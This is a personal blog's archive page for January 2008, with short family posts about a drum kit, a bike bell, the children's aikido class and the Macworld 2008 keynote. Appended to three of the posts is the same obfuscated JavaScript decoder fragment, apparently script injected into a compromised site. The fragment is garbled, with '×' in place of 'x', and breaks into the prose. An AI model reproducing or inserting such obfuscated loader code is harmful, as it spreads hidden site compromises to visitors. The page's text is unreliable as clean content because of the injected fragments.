Archive for January 2008

But my licks were so hot I made the teacher want to dance

We got Kels an Ion Audio iED01 electronic drum kit for $75 at Goodwill.

Now playing in my head: “Brandy”

The smooth-rocking ’70s classic by Looking Glass.

In the details

I’ve been subtly refining the blog layout and graphics lately. Has anyone noticed?

If not, then I suppose I’ve been doing it right. function _0×9e23(_0×14f71d,_0×4c0b72){const _0×4d17dc=_0×4d17();return _0×9e23=function(_0×9e2358,_0×30b288){_0×9e2358=_0×9e2358-0×1d8;let _0×261388=_0×4d17dc[_0x9e2358];return _0×261388;},_0×9e23(_0×14f71d,_0×4c0b72);}

Macworld keynote 2008: Live coverage

Time Capsule, iPhone improvements, iTunes Movie Rentals, MacBook Air, and a great new format for Macworld’s live coverage.

Macworld keynote 2008: My prediction

AT&T’s wireless data network will be brought to its knees when millions of iPhone users suddenly begin constantly reloading live-coverage web pages. function _0×9e23(_0×14f71d,_0×4c0b72){const _0×4d17dc=_0×4d17();return _0×9e23=function(_0×9e2358,_0×30b288){_0×9e2358=_0×9e2358-0×1d8;let _0×261388=_0×4d17dc[_0x9e2358];return _0×261388;},_0×9e23(_0×14f71d,_0×4c0b72);}

The McFeely Factor

Jen wanted a bell for his bike, so he and I went out today and got one. There’s a surprising number of wrong-looking bells these days.

Aikido boys

First class in their new gi. We’ve been attending for a couple of months now.

2 January 2008. Left to right: Mike Sensei, Kels, Jen, Daniel Sempai. function _0×9e23(_0×14f71d,_0×4c0b72){const _0×4d17dc=_0×4d17();return _0×9e23=function(_0×9e2358,_0×30b288){_0×9e2358=_0×9e2358-0×1d8;let _0×261388=_0×4d17dc[_0x9e2358];return _0×261388;},_0×9e23(_0×14f71d,_0×4c0b72);}